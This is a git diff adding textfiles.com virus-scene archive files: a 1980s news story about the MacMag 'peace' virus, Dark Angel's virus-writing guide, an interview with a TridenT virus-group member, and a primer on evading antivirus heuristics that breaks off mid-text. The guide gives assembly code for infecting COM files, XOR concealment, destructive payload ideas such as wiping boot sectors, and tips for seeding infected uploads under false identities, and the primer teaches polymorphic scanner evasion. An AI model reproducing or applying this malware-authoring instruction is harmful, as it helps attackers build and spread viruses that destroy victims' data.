zR=OEIll7_dq#4JIgVs^DJV|q3Qs^sUqQ8aS={?k%iVW%KwQP5UK4UP9Bl@7}{yI69
zMkc*<mJUGlnq!4?CL^j~Q6|ziH+Onnd<>dj*GVYHP#Ty+0x*z48a<bx{FnJPN3Go`
z`=}ZtGb5GGP)W>{`%=$w92*8#6*hVBXap#o)P_P1jYELImCACd7GzQ#@m{86k)DK_
zeJD&nsXC$uq8fH<ePM?Y3PVtrA>L=^NVJ(l()FA2?I3Z`J+LC(j79vhvu``HMFuVz
z)fqIjYf*<(vpI^y>7Gl&G8CJLZ?F{6<t_Jl^^~i>C>M$b7WMMA|0VymBG<yd-*An?
ePDN+m6M%XU00DzluJc-kV<S6$|Bv7O#_M0akqS2e

literal 0
HcmV?d00001

diff --git a/textfiles.com/virus/peacevir.vir b/textfiles.com/virus/peacevir.vir
new file mode 100644
index 00000000..c2a0a580
--- /dev/null
+++ b/textfiles.com/virus/peacevir.vir
@@ -0,0 +1,58 @@
+COMPUTER VIRUS HITS AGAIN
+
+A tiny mischievous computer program called a "virus" has popped
+up for what experts believe is the first time in retail software,
+according to a newspaper report published Tuesday.
+
+The appearance of the virus raises the fear that devilish
+programs created by practical jokers or vandals could be used to
+destroy computer software sold in stores, according to a story in
+the San Jose Mercury News.
+
+The virus found last week in FreeHand, a Macintosh program from
+Aldus Corp. in Seattle, consisted of a "message of peace"
+designed to appear on Macintosh screens on March 2, the
+anniversary of the Apple Macintosh SE and the Macintosh II,
+according to the report.
+
+"The time bomb already went off," said Donn Parker, a computer
+security specialist at SRI in Menlo Park.  Although the brief
+pease message was harmless, its appearance alarmed experts who
+until now thought viruses were hidden only on software available
+on bulletin boards for little or no cost, or on programs shared
+by swappers, the newspaper reported.
+
+The "message of peace" virus originated at a Canadian publication
+called MacMag and was distributed by many bulletin boards in a
+program that purported to be a new listing of products made by
+Apple.
+
+The virus was inadvertently passed to Aldus by Marc Canter
+president of MacroMind Inc., of Chicago, maker of training disks
+for Aldus.  Aldus would not disclose how many FreeHand copies are
+infected but said a disk duplicating machine  copied the infected
+disk for three days.  Half the infected disks have been
+distributed to retail outlets and the rest are in the company's
+warehouse.
+
+Canter was on a trip to Canada when he received an infected
+program for the Mr. Potato Head game, a computerized version of
+the popular toy. Unaware of the infection, Canter ran the
+program once and when he used the same computer to work on Aldus
+software, the disk headed for Aldus also became infected, he
+said.
+
+The computer virus was then inadvertently copied onto disks sold
+to customers and infected their computers, he said.
+
+It appears software designed by Lotus Development Corp.,Apple
+Computer Inc., of Cupertino; and Ashton-Tate may be infected by
+the virus, Canter told the Mercury News.
+
+                                From the:
+                                San Jose, Associated Press.
+
+                                Compliments of the
+                                Saginaw Valley Computer Association
+                                Furnished by Nancy Burdick
+
\ No newline at end of file
diff --git a/textfiles.com/virus/ph-vir1.txt b/textfiles.com/virus/ph-vir1.txt
new file mode 100644
index 00000000..afd7a282
--- /dev/null
+++ b/textfiles.com/virus/ph-vir1.txt
@@ -0,0 +1,445 @@
+    //==//  //  //  /||      //      //====  //==//  //|   //
+   //  //  //  //  //||     //      //      //  //  //||  //
+  //==//  //==//  //=||    //      //      //  //  // || //
+ //      //  //  //  ||   //      //      //  //  //  ||//
+//      //  //  //   ||  //====  //====  //==//  //   ||/
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+DISCLAIMER: The author hereby disclaims himself
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+DEDICATION: This was written to make the lives
+  of scum such as Patty Hoffman, John McAffee,
+  and Ross Greenberg a living hell.
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+OTHER STUFF:  Thanks go to The Shade of Sorrow,
+  Demogorgon, and Orion Rouge on their comments
+  (which I occasionally listened to!).   Thanks
+  also to Hellraiser, who gave me an example of
+  some virus source code (his own, of course).
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Dark Angel's Phunky Virus Writing Guide
+---- ------- ------ ----- ------- -----
+Virii are  wondrous creations written for the sole purpose of spreading and
+destroying the  systems of unsuspecting fools.  This eliminates the systems
+of simpletons  who can't  tell that there is a problem when a 100 byte file
+suddenly blossoms  into a  1,000 byte  file.   Duh.  These low-lifes do not
+deserve to  exist, so  it is  our sacred duty to wipe their hard drives off
+the face of the Earth.  It is a simple matter of speeding along survival of
+the fittest.
+
+Why did  I create  this guide?  After writing several virii, I have noticed
+that virus  writers generally  learn how to write virii either on their own
+or by  examining the  disassembled code  of  other  virii.    There  is  an
+incredible lack  of information  on the  subject.   Even books published by
+morons such as Burger are, at best, sketchy on how to create a virus.  This
+guide will show you what it takes to write a virus and also will give you a
+plethora of source code to include in your own virii.
+
+Virus writing  is not  as hard  as you  might first  imagine.   To write an
+effective virus,  however, you  *must*  know  assembly  language.    Short,
+compact code  are hallmarks  of assembly  language and  these are desirable
+characteristics of  virii.  However, it is *not* necessary to write in pure
+assembly.   C may  also be  used, as  it allows almost total control of the
+system while  generating relatively compact code (if you stay away from the
+library functions).   However,  you still  must access  the interrupts,  so
+assembly knowledge  is still  required.  However, it is still best to stick
+with pure  assembly,  since  most  operations  are  more  easily  coded  in
+assembly.  If you do not know assembly, I would recommend picking up a copy
+of The Microsoft Macro Assembler Bible (Nabajyoti Barkakati, ISBN #: 0-672-
+22659-6).   It is an easy-to-follow book covering assembly in great detail.
+Also get yourself a copy of Undocumented DOS (Schulman, et al, ISBN #0-201-
+57064-5), as it is very helpful.
+
+The question  of which  compiler to  use arises  often.   I  suggest  using
+Borland Turbo  Assembler and/or  Borland C++.   I  do not  have a  copy  of
+Zortech C  (it was  too large  to download), but I would suspect that it is
+also a good choice.  Stay away from Microsoft compilers, as they are not as
+flexible nor as efficient as those of other vendors.
+
+A few more items round out the list of tools helpful in constructing virii.
+The latest version of Norton Utilities is one of the most powerful programs
+available, and  is immeasurably  helpful.   MAKE SURE YOU HAVE A COPY!  You
+can find  it on  any decent board.  It can be used during every step of the
+process, from  the writing  to the testing.  A good debugger helps.  Memory
+management  utilities   such  as   MAPMEM,  PMAP,   and  MARK/RELEASE,  are
+invaluable, especially  when coding  TSR virii.   Sourcer,  the  commenting
+disassembler, is  useful when  you wish  to examine the code of other virii
+(this is a good place to get ideas/techniques for your virus).
+
+Now that  you have  your tools,  you are  ready to  create a  work  of  art
+designed to smash the systems of cretins.  There are three types of virii:
+
+     1) Tiny virii (under 500 bytes) which are designed to be  undetectable
+        due to their small size.   TINY  is  one  such  virus.    They  are
+        generally very simple because their code length is so limited.
+     2) Large  virii  (over 1,500 bytes)   which   are   designed   to   be
+        undetectable because they cover their tracks very  well  (all  that
+        code DOES have a use!).  The best example  of  this  is  the  Whale
+        virus, which is perhaps the best 'Stealth' virus in existence.
+     3) Other virii which are not designed to be hidden at all (the writers
+        don't give  a  shit).    The  common  virus  is  like  this.    All
+        overwriting virii are in this category.
+
+You must  decide which  kind of  virus you wish to write.  I will mostly be
+discussing  the  second  type  (Stealth  virii).    However,  many  of  the
+techniques discribed  may be easily applied to the first type (tiny virii).
+However, tiny  virii generally do not have many of the "features" of larger
+virii, such  as  directory  traversal.    The  third  type  is  more  of  a
+replicating trojan-type,  and will  warrant a  brief  (very,  very  brief!)
+discussion later.
+
+A virus may be divided into three parts: the replicator, the concealer, and
+the bomb.   The  replicator part  controls the spread of the virus to other
+files, the concealer keeps the virus from being detected, and the bomb only
+executes when  the activation  conditions of the virus (more on that later)
+are satisfied.
+
+-=-=-=-=-=-=-=-
+THE REPLICATOR
+-=-=-=-=-=-=-=-
+The job  of the  replicator is to spread the virus throughout the system of
+the clod  who has caught the virus.  How does it do this without destroying
+the file it infects?  The easiest type of replicator infects COM files.  It
+first saves  the first  few bytes  of the  infected file.  It then copies a
+small portion of its code to the beginning of the file, and the rest to the
+end.
+
+  +----------------+      +------------+
+  | P1 | P2        |      | V1 | V2    |
+  +----------------+      +------------+
+ The uninfected file     The virus code
+
+In the  diagram, P1 is part 1 of the file, P2 is part 2 of the file, and V1
+and V2  are parts 1 and 2 of the virus.  Note that the size of P1 should be
+the same  as the size of V1, but the size of P2 doesn't necessarily have to
+be the  same size  as V2.   The  virus first  saves P1 and copies it to the
+either 1)  the end  of the  file or 2) inside the code of the virus.  Let's
+assume it copies the code to the end of the file.  The file now looks like:
+
+  +---------------------+
+  | P1 | P2        | P1 |
+  +---------------------+
+
+Then, the  virus copies  the first  part of  itself to the beginning of the
+file.
+
+  +---------------------+
+  | V1 | P2        | P1 |
+  +---------------------+
+
+Finally, the virus copies the second part of itself to the end of the file.
+The final, infected file looks like this:
+
+  +-----------------------------+
+  | V1 | P2        | P1 | V2    |
+  +-----------------------------+
+
+The question  is: What  the fuck  do V1 and V2 do?  V1 transfers control of
+the program to V2.  The code to do this is simple.
+
+     JMP FAR PTR Duh       ; Takes four bytes
+Duh  DW  V2_Start          ; Takes two bytes
+
+Duh is  a far pointer (Segment:Offset) pointing to the first instruction of
+V2.   Note that  the value  of Duh must be changed to reflect the length of
+the file  that is  infected.   For example,  if the  original size  of  the
+program is  79 bytes,  Duh must  be changed  so  that  the  instruction  at
+CS:[155h] is  executed.   The value of Duh is obtained by adding the length
+of V1,  the original size of the infected file, and 256 (to account for the
+PSP).  In this case, V1 = 6 and P1 + P2 = 79, so 6 + 79 + 256 = 341 decimal
+(155 hex).
+
+An alternate, albeit more difficult to understand, method follows:
+
+     DB 1101001b              ; Code for JMP (2 byte-displacement)
+Duh  DW V2_Start - OFFSET Duh ; 2 byte displacement
+
+This inserts  the jump  offset directly  into the  code following  the jump
+instruction.  You could also replace the second line with
+
+     DW V2_Start - $
+
+which accomplishes the same task.
+
+V2 contains the rest of the code, i.e. the stuff that does everything else.
+The last  part of  V2 copies  P1 over  V1 (in memory, not on disk) and then
+transfers control  to the  beginning of the file (in memory).  The original
+program will  then run happily as if nothing happened.  The code to do this
+is also very simple.
+
+     MOV SI, V2_START      ; V2_START is a LABEL marking where V2 starts
+     SUB SI, V1_LENGTH     ; Go back to where P1 is stored
+     MOV DI, 0100h         ; All COM files are loaded @ CS:[100h] in memory
+     MOV CX, V1_LENGTH     ; Move CX bytes
+     REP MOVSB             ; DS:[SI] -> ES:[DI]
+
+     MOV DI, 0100h
+     JMP DI
+
+This code assumes that P1 is located just before V2, as in:
+
+P1_Stored_Here:
+     .
+     .
+     .
+V2_Start:
+
+It also  assumes ES  equals CS.  If these assumptions are false, change the
+code accordingly.  Here is an example:
+
+     PUSH CS               ; Store CS
+     POP  ES               ;  and move it to ES
+                           ; Note MOV ES, CS is not a valid instruction
+     MOV SI, P1_START      ; Move from whereever P1 is stored
+     MOV DI, 0100h         ;  to CS:[100h]
+     MOV CX, V1_LENGTH
+     REP MOVSB
+
+     MOV DI, 0100h
+     JMP DI
+
+This code  first moves CS into ES and then sets the source pointer of MOVSB
+to where  P1 is located.  Remember that this is all taking place in memory,
+so you  need the  OFFSET of P1, not just the physical location in the file.
+The offset  of P1  is 100h  higher than  the physical file location, as COM
+files are loaded starting from CS:[100h].
+
+So here's a summary of the parts of the virus and location labels:
+
+V1_Start:
+     JMP FAR PTR Duh
+Duh  DW  V2_Start
+V1_End:
+
+P2_Start:
+P2_End:
+
+P1_Start:
+  ; First part of the program stored here for future use
+P1_End:
+
+V2_Start:
+  ; Real Stuff
+V2_End:
+
+V1_Length EQU V1_End - V1_Start
+
+Alternatively, you could store P1 in V2 as follows:
+
+V2_Start:
+
+P1_Start:
+P1_End:
+
+V2_End:
+
+That's all there is to infecting a COM file without destroying it!  Simple,
+no?   EXE files,  however, are a little tougher to infect without rendering
+them inexecutable - I will cover this topic in a later file.
+
+Now let  us turn our attention back to the replicator portion of the virus.
+The steps are outlined below:
+
+     1) Find a file to infect
+     2) Check if it is already infected
+     3) If so, go back to 1
+     4) Infect it
+     5) If infected enough, quit
+     6) Otherwise, go back to 1
+
+Finding a  file to  infect is  a  simple  matter  of  writing  a  directory
+traversal procedure  and issuing  FINDFIRST  and  FINDNEXT  calls  to  find
+possible files  to infect.   Once  you find  the file, open it and read the
+first few  bytes.   If they are the same as the first few bytes of V1, then
+the file  is already  infected.  If the first bytes of V1 are not unique to
+your virus,  change it  so that they are.  It is *extremely* important that
+your virus  doesn't reinfect  the same  files, since that was how Jerusalem
+was first  detected.   If the file wasn't already infected, then infect it!
+Infection should take the following steps:
+
+     1) Change the file attributes to nothing.
+     2) Save the file date/time stamps.
+     3) Close the file.
+     4) Open it again in read/write mode.
+     5) Save P1 and append it to the end of the file.
+     6) Copy V1 to the beginning, but change the offset which it JMPs to so
+        it transfers control correctly. See the previous part on infection.
+     7) Append V2 to the end of the file.
+     8) Restore file attributes/date/time.
+
+You should  keep a counter of the number of files infected during this run.
+If the number exceeds, say three, then stop.  It is better to infect slowly
+then to give yourself away by infecting the entire drive at once.
+
+You must  be sure  to cover  your tracks  when you infect a file.  Save the
+file's  original   date/time/attributes  and  restore  them  when  you  are
+finished.   THIS IS VERY IMPORTANT!  It takes about 50 to 75 bytes of code,
+probably less,  to do  these few simple things which can do wonders for the
+concealment of your program.
+
+I will  include code for the directory traversal function, as well as other
+parts of the replicator in the next installment of my phunky guide.
+
+-=-=-=-=-
+CONCEALER
+-=-=-=-=-
+This is  the part  which conceals  the program  from notice by the everyday
+user and virus scanner.  The simplest form of concealment is the encryptor.
+The code for a simple XOR encryption system follows:
+
+encrypt_val   db   ?
+
+decrypt:
+encrypt:
+     mov ah, encrypt_val
+
+     mov cx, part_to_encrypt_end - part_to_encrypt_start
+     mov si, part_to_encrypt_start
+     mov di, si
+
+xor_loop:
+     lodsb                 ; DS:[SI] -> AL
+     xor al, ah
+     stosb                 ; AL -> ES:[DI]
+     loop xor_loop
+     ret
+
+Note the encryption and decryption procedures are the same.  This is due to
+the weird  nature of  XOR.   You can CALL these procedures from anywhere in
+the program,  but make sure you do not call it from a place within the area
+to be  encrypted, as  the program  will crash.  When writing the virus, set
+the encryption  value to  0.  part_to_encrypt_start and part_to_encrypt_end
+sandwich the area you wish to encrypt.  Use a CALL decrypt in the beginning
+of V2  to unencrypt  the file  so your  program can  run.  When infecting a
+file, first change the encrypt_val, then CALL encrypt, then write V2 to the
+end of the file, and CALL decrypt.  MAKE SURE THIS PART DOES NOT LIE IN THE
+AREA TO BE ENCRYPTED!!!
+
+This is how V2 would look with the concealer:
+
+V2_Start:
+
+Concealer_Start:
+  .
+  .
+  .
+Concealer_End:
+
+Replicator_Start:
+  .
+  .
+  .
+Replicator_End:
+
+Part_To_Encrypt_Start:
+  .
+  .
+  .
+Part_To_Encrypt_End:
+V2_End:
+
+Alternatively, you  could move  parts  of  the  unencrypted  stuff  between
+Part_To_Encrypt_End and V2_End.
+
+The value  of encryption  is readily  apparent.  Encryption makes it harder
+for virus  scanners to  locate your virus.  It also hides some text strings
+located in  your program.   It is the easiest and shortest way to hide your
+virus.
+
+Encryption is only one form of concealment.  At least one other virus hooks
+into the  DOS interrupts  and alters  the output  of DIR  so the file sizes
+appear normal.   Another  concealment scheme  (for TSR virii) alters DOS so
+memory utilities  do not  detect the  virus.   Loading the virus in certain
+parts of  memory allow  it to survive warm reboots.  There are many stealth
+techniques, limited only by the virus writer's imagination.
+
+-=-=-=-=-
+THE BOMB
+-=-=-=-=-
+So now all the boring stuff is over.  The nastiness is contained here.  The
+bomb part  of the virus does all the deletion/slowdown/etc which make virii
+so annoying.   Set  some activation  conditions of  the virus.  This can be
+anything, ranging  from when  it's your  birthday to  when  the  virus  has
+infected 100  files.   When these  conditions are met, then your virus does
+the good stuff.  Some suggestions of possible bombs:
+
+     1) System slowdown - easily  handled  by  trapping  an  interrupt  and
+        causing a delay when it activates.
+     2) File deletion - Delete all ZIP files on the drive.
+     3) Message display - Display a nice message saying  something  to  the
+        effect of "You are fucked."
+     4) Killing/Replacing the Partition Table/Boot Sector/FAT of  the  hard
+        drive - This is very nasty, as most dimwits cannot fix this.
+
+This is, of course, the fun part of writing a virus, so be original!
+
+-=-=-=-=-=-=-=-
+OFFSET PROBLEMS
+-=-=-=-=-=-=-=-
+There is  one caveat  regarding calculation of offsets.  After you infect a
+file, the  locations of  variables change.  You MUST account for this.  All
+relative offsets  can stay  the same, but you must add the file size to the
+absolute offsets  or your  program will  not work.  This is the most tricky
+part of  writing virii  and taking  these into  account can  often  greatly
+increase the  size of  a virus.   THIS  IS VERY IMPORTANT AND YOU SHOULD BE
+SURE TO  UNDERSTAND THIS BEFORE ATTEMPTING TO WRITE A NONOVERWRITING VIRUS!
+If you  don't, you'll  get fucked  over and  your virus WILL NOT WORK!  One
+entire part of the guide will be devoted to this subject.
+
+-=-=-=-
+TESTING
+-=-=-=-
+Testing virii  is a  dangerous yet  essential part  of the  virus  creation
+process.   This is  to make  certain that people *will* be hit by the virus
+and, hopefully,  wiped out.   Test  thoroughly and  make sure  it activates
+under the  conditions.  It would be great if everyone had a second computer
+to test  their virii  out, but,  of course, this is not the case.  So it is
+ESSENTIAL that  you keep BACKUPS of your files, partition, boot record, and
+FAT.   Norton is  handy in  this doing  this.  Do NOT disregard this advice
+(even though  I know  that you will anyway) because you WILL be hit by your
+own virii.   When  I wrote my first virus, my system was taken down for two
+days because I didn't have good backups.  Luckily, the virus was not overly
+destructive.   BACKUPS MAKE  SENSE!  LEECH A BACKUP PROGRAM FROM YOUR LOCAL
+PIRATE BOARD!   I find a RamDrive is often helpful in testing virii, as the
+damage is  not permanent.   RamDrives  are also useful for testing trojans,
+but that is the topic of another file...
+
+-=-=-=-=-=-=-
+DISTRIBUTION
+-=-=-=-=-=-=-
+This is  another fun  part of  virus writing.   It  involves  sending  your
+brilliantly-written  program   through  the  phone  lines  to  your  local,
+unsuspecting bulletin  boards.   What you  should do  is infect a file that
+actually does something (leech a useful utility from another board), infect
+it, and upload it to a place where it will be downloaded by users all over.
+The best  thing is  that it  won't be detected by puny scanner-wanna-bes by
+McAffee, since it is new!  Oh yeah, make sure you are using a false account
+(duh).   Better yet,  make a  false account  with the  name/phone number of
+someone you  don't like  and upload  the infected  file under the his name.
+You can  call back  from time to time and use a door such as ZDoor to check
+the spread  of the virus.  The more who download, the more who share in the
+experience of your virus!
+
+I promised a brief section on overwriting virii, so here it is...
+-=-=-=-=-=-=-=-=-
+OVERWRITING VIRII
+-=-=-=-=-=-=-=-=-
+All these  virii do  is spread  throughout the  system.   They  render  the
+infected files  inexecutable, so they are easily detected.  It is simple to
+write one:
+
+   +-------------+   +-----+   +-------------+
+   | Program     | + |Virus| = |Virus|am     |
+   +-------------+   +-----+   +-------------+
+
+These virii are simple little hacks, but pretty worthless because of their
+easy detectability.  Enuff said!
+
+-=-=-=-=-=-=-=-=-=-=-=-=-
+WELL, THAT JUST ABOUT...
+-=-=-=-=-=-=-=-=-=-=-=-=-
+wraps it  up for  this installment  of Dark  Angel's Phunky  virus  writing
+guide.   There will (hopefully) be future issues where I discuss more about
+virii and  include much  more source  code (mo' source!).  Till then, happy
+coding!
diff --git a/textfiles.com/virus/pngintrv.iew b/textfiles.com/virus/pngintrv.iew
new file mode 100644
index 00000000..2bdeced7
--- /dev/null
+++ b/textfiles.com/virus/pngintrv.iew
@@ -0,0 +1,268 @@
+--------------------------------------------------------------------------------
+       INTERVIEW WITH PERSONA NO GRATA / TRIDENT / THE NETHERLANDS
+--------------------------------------------------------------------------------
+
+ Give me a short description of who you are!
+
+- Hello everybody I'm Persona No Grata and doing mainly some PR-Stuff
+  for TridenT. I keep in contact with other groups and distribute the
+  new releases to other researchers/viruswriters. I'm a non-virus-
+  writer, I only collect the stuff. As like all TridenT members I'm
+  living in the Netherlands. I'm somewhere in the beginning of my
+  twenties.
+
+ From where did you get your handle, Persona No Grata?
+
+- Well I have been using several handles over the years (like many of 
+  the other TridenT members). I thought Persona No Grata is a nice
+  name which means a person who is not welcome.
+
+ When did you discovered the world of computers?
+
+- Well I started out on the C64 (years and years ago) after that I
+  bought an Amiga 500 and I got a PC since 1991 now.
+
+ How long have you been active in the scene?
+
+- In the virus scene? since the end of 1992, before that was in some
+  C64 and amiga groups.
+
+ What part(s) of the underground do you think needs improvements?
+
+- Dont think any part of the virus 'underground' has to improve. It's
+  just that the european virusscene should be more active
+
+ Have you been involved in any other group than Trident?
+
+- Not in any other virii-group, think no TridenT member has been in
+  another virus-group. Because when TridenT started the contacts
+  between virus writers werent that good, nowadays people get on the
+  internet and start chatting on irc.
+
+ Who started/created Trident?
+
+- John Tardy and Bit Addict started the group some years ago, think
+  after that Masud Khafir joined etc.
+
+ What's the groups goal?
+
+- The contact between the 'members' is just on a friendly bases, we
+  dont have any bosses or people who think they are better than the
+  rest. We dont push people to release virii every week/month. A
+  TridenT virus only is released when it's good enough. We got stacks
+  of experimental virusses which were never released and will never be.
+
+ How many people are you?
+
+- It differs from time to time, handles come and go ;)
+
+ What's their handles?
+
+- let's just stay with John Tardy, Masud Khafir, Bit Addict, Dark
+  Helmet, Crom-Cruach and DarkRay.
+
+ Do all of them program, if not, what's the others job?
+
+- All of us program, just some of us dont use their ablitities to
+  make virii.
+
+ Who are the "leading/head-persons" in the group?
+
+- We dont have any leading persons. We dont need it and there never
+  will be any one who is bossing people around. TridenT members are
+  free to come and go.
+
+ How is Trident (currently) organzied?
+
+- It's not organized in any way... We used to have our own TridenT
+  mail-network but we are currently taking it easy :(
+
+ Can anyone ask for membership, or are you a "private" group?
+
+- I get this question more often then normally. Well we like to stay
+  all dutch. But if a person is really good w'll consider it.
+
+ What responses have you had about TPE?
+
+- If you say TridenT, 8 of 10 people say TPE (maybe because Masud
+  named it TridenT Polymorphic Engine?).
+
+ Even thought polymorphic engine's are a great thing, not many
+ people seems to use them? You have any theorie why they don't?
+
+- Oh well people use them allright I think.
+
+ Have you ever thought of/are you currently releasing some sort of
+ electronic magazine (text/executable/hard-copy)?
+
+- We've had several discussions about that, but we even couldnt agree
+  on the name, we thought of TridenTial and when we finally agreed on
+  it, we couldnt agree wether to put sources in it or not... One day
+  we (John Tardy in a drunk mood) started typing text but when we woke
+  up the next morning we sobered and putted it on disk somewhere (where
+  it probably still is).
+
+ Are you into other things such as hacking and phreaking aswell, or
+ just viruses?
+
+- I think I'm the only one in TridenT who is doing hacking/Phreaking
+  although I cant do it as frequent as I like to do it. :((
+
+ Which is the best way of contacting you?
+
+ People can contact me on NuKE-Net.
+
+ Can you name a few viruses that Trident has written?
+ has written?
+
+- Well just take patricia's vsum and search for all Origin: The
+  Netherlands think 95% of it is made by TridenT.. 
+
+ Do you have any sort of company or law-enforcement who are trying
+ to hunt Trident down?
+
+- Probably the CRI who has got a special division called Computer Crime
+  (Computer Criminaliteit (Dutch)).
+
+ If so, are they a real threat or just "childish"?
+
+- Well I think it's 'childish' but it could be a real threat to TridenT
+  however.
+
+ Have you ever had any trouble in the group with the result of kicked
+ member(s)?
+
+- Nope, we only gave members warnings when they did something 'stupid'
+  but that's mutual I think ;-)
+
+ How good are Trident comparing to other groups (P/S & NuKE?)
+
+- Well NuKE isnt active anymore, and most of the virii they released
+  suck. (though NuKE has some good programmers). Phalcon/Skism has
+  made nice virii and I also like their magazine (40hex is the best
+  around) and the guys are always around on the internet.
+
+ Do you call out aloth, and if so how?
+
+- I call out sometimes, but mosttimes to the internet. In the
+  Netherlands there are only a few good boards so.
+
+ Do you have any couriers that spread your products around?
+
+- Nope, I only send it via the internet and that's it.
+
+ What do you think about the laws against h/p/v that has arrived
+ lately?
+
+- It sucks and there are still a lot of 'holes' in it. It's not clearly
+  written and we just have to wait till there is a test-case so we
+  really know what and how.. (not-implementing anything here ;-))
+
+ What do you think about various news-papers thinking us as nerds?
+
+- I dont read news-papers ;-)
+
+ Do you see any differences between the scene now and a couple of
+ years ago (concerning the underground part ofcause)?
+
+- The scene is more open than a couple of years ago. Contacts between
+  other virus writers was difficult.
+
+ Which virus-magazine do you think is the best avalible now-a-days?
+
+- 40hex (can get it at several internet sites).
+
+ Which virus-group/programmer do you admire/like?
+
+- I dont admire any of them. Liking is another word.
+  (on a friendly bases).
+
+ Which country do you think is the best virus-writing today?
+
+- Probably the usa,because most of them hang out there (ofcoz the
+  country is big etc).
+
+ What do you think about these virus generators, such as VCL or PS-MPC?
+
+- I like the idea, not the people using it. Every dickhead can create a
+  'virus' nowadays. 
+
+ What do you think about the people using them?
+
+- It's good for virii collectors (cause they can say they got 5000+
+  virii on line) but that's about it. I dont like people uploading
+  files to boards like 'newgame.zip' with in it some virii.
+
+ What do you think about people bragging over (almost) nothing
+ and ragging with other groups aswell?
+
+- Keeps the scene lively.
+
+ What do you think about such individes as board-crashers?
+
+- Get a life.
+
+ Describe the perfect virus :
+
+- A virus which uses several techniques and tricks all scanners on
+  the market.
+
+ Describe the perfect viruscoder :
+
+- 16 year old geeks, drinking beer and smoking pot. ??? well dunno
+  really
+
+ Describe the AV-community with a few lines :
+
+- Monopoly dudes thinking they are so damn good and better as the rest.
+
+ Which AV-program do think is the best, and why?
+
+- f-prot together with tbav.
+
+ What do you think about the underground's future?
+
+- As you see, magazines and groups come and go, I've seen 14 year old
+  kids who start programming and like to create virii. The last years
+  the virus business has been booming several new virii come out each
+  day.
+
+ Do you know/heard of any new technics coming in the near future?
+
+- nope
+
+ Any advice to people who want's to learn the basic of virus-writing?
+
+- Well if you got internet access join the #virus channel on irc. Get
+  ahold on 40hex that's pretty much about it.
+
+ Something else you wish to say?
+
+- Just continue releasing the Insane Reality magazine, I hope it comes
+  out as frequent as the Crypt Magazine ;-)
+
+ Do you wish to send any greets?
+
+- well first of all greets to all Immortal Riot dudes.
+  * Metal Militia and the Flash.
+  * All TridenT members (also the ones which didnt cooperate on the
+    interview, well probably because I didnt ask them?) hehe
+  * Garbage Heap (P/S), when will the next issue be released. Hopefully
+    the Mirror Virus Source code by Bit Addict/TridenT will be in it.
+  * Urnst Kouch (Crypt Magazine). The magazine is great and is the only
+    one which keeps comming out on a regular basis. Nice going.
+  * Savage Beast/NuKE Coordinator Europe. You probably got the disks at
+    the time you read this ?
+  * Azrael/NuKE Coordinator South America. You need a dictionairy (hehe
+    Just kidding). Also greets to your friend Murdock.
+  * Maddog/NaTe call me more frequent will you.
+  * Coaxial Karma/NPC did InterMail work out okay? Too bad about the OD.
+  * CryptKeeper (P/S) Hopes everything works out okay for you.
+  * Macaroni Ted & Jaywalker/A.N.O.I. Come on start working again guys.
+  * Doctor Revenge (NuKE Italy) Nice going dude.
+  * Kohntark thx for the preview. Is the official one finished?
+  * Hellraiser (P/S) Long time no see on the net?
+  * Memory Lapse (P/S) Will send you my allfiles.
+  * Zerial for being a pain in the ass
+  * Kevin Martinez for being a cool dude. Talk to you later.
+  * Sigma One thx again dude
\ No newline at end of file
diff --git a/textfiles.com/virus/polyflag.txt b/textfiles.com/virus/polyflag.txt
new file mode 100644
index 00000000..962c10f5
--- /dev/null
+++ b/textfiles.com/virus/polyflag.txt
@@ -0,0 +1,507 @@
+ A Humble PolyMorphic Engine Primer by Absolute Overlord
+
+ Foreward
+ Since I've done a tremendous amount of research into avoiding flags
+ with a polymorphic engine I've decided to document my research and
+ present it for the benefit of others persuing the same.
+ The benefits of using a polymorphic engine are excellent provided
+ your engine achieves the requisite level of 'cleanliness' as far
+ as heuristical flags go. The majority of polymorphic viruses have
+ been stopped dead in their tracks due to the absurd level of flags
+ they have been known to cause. If all of a sudden programs you knew
+ which didn't have any flags scan as:
+
+ G  Garbage instructions.  Contains code that seems to have no purpose
+    other than encryption or avoiding recognition by virus scanners.
+ @  Encountered instructions which are not likely to be generated by
+    an assembler, but by some code generator like a polymorphic virus.
+ 1  Found instructions which require a 80186 processor or above.
+ #  Found a code decryption routine or debugger trap.  This is common
+    for viruses but also for some copy-protected software.
+    
+
+ Then you know you have a virus. Of course if your virus does things
+ like scramble the keyboard buffer or print 'FUCK YOU' on the screen
+ every ten seconds none of this discussion is really going to be worth
+ your while. ;)
+
+
+
+ First, the good news. Web and Avp *suck* next to tbav, and frankly
+ the only scanner to use in your test bed is TBAV.
+ Now the bad news. TBAV is damn good at catching all kinds of garbage
+ code and finding decryption loops.
+ The main thing to know here is that 1 flag is bad but 2 spells a
+ catastrophe. This is because if tbav finds 2 flags on a file while
+ scanning with high heuristics it will pop up the ubiquitious red
+ warning window and summarily decide the file is infected.
+
+
+ First, the decryption loop.
+
+ In even the best polymorphic engines I've seen tbav finds the decryptor
+ loop 5 times out of 10. It's hard to state the exact reason this is
+ but it evens finds the decryptor loop in Rhincewind's Rhince engine
+ droppers. This is peculiar because Rhince uses a very slick method
+ of inserting a number of mov [memlocation], opcode instructions.
+ The decryptor is actually laid down at the end of the 'header' while
+ the header is executing. A fantastic idea, but nevertheless one that fails
+ to elude tbav. Dark Slayer uses the method of xor [si,di,bp or bx], seed
+ but tbav will catch this as well about 50% of the time.
+ I hypothesized that if I spread the individual instructions for the
+ decryptor loop over a number of subroutines that formed the actual
+ loop tbav would fail to find it. I was right. So this is the method
+ I use now in S.H.I.T. Of course, eventually tbav will be able to detect
+ even this as well. I think tbav tries to keep track of memory pointed
+ to by the index registers and watches for successive memory location
+ changes. Hard to tell. One thing is certain though. A polymorphic
+ engine must make a good show of attempting to hide the decryptor
+ or the whole point is lost. You certainly can't have 50 files
+ suddenly flagging as having a decryptor that didn't flag so before.
+
+
+ Second, the dreaded @ polymorph engine flag.
+
+ This one is not so hard to pin down. Almost all single byte opcodes
+ like DAA, AAD, LOCK and other oddities you would rarely use in a
+ program will trigger it. Addressing modes like mov dx,[bp+di+3425h]
+ will trigger it. Lots of adc's, sub's ,cmp's, dec's and inc's will
+ trigger it. Register operations involving bp, di, si,and sp will
+ move you towards a trigger (but not gaurantee one).
+
+ Any incidence of an opcode like mov al,ah where the direction bit
